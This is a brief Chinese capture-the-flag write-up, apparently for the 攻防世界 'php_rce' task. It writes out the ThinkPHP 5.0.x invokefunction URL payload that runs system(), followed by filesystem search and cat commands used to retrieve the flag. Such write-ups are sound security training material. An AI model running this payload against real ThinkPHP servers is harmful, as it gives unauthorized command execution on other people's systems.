admin管理员组

文章数量:1794759

thinkPHP

thinkPHP

php_rce攻防世界:

百度thinkphpv5,查询到其存在过漏洞

在网页中随便注入,可观察到其版本为V5.0.20

再上旬该版本漏洞,描述为:

只要在url后添加

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= (+操作)即可进入后台

进行 find / -name flag* 搜索

找到最后一行的flag

再进行 cat /tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /flag /flag

获取到flag{thinkphp5_rce}

本文标签: thinkphp

版权声明:本文标题:thinkPHP 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1692781723a192409.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。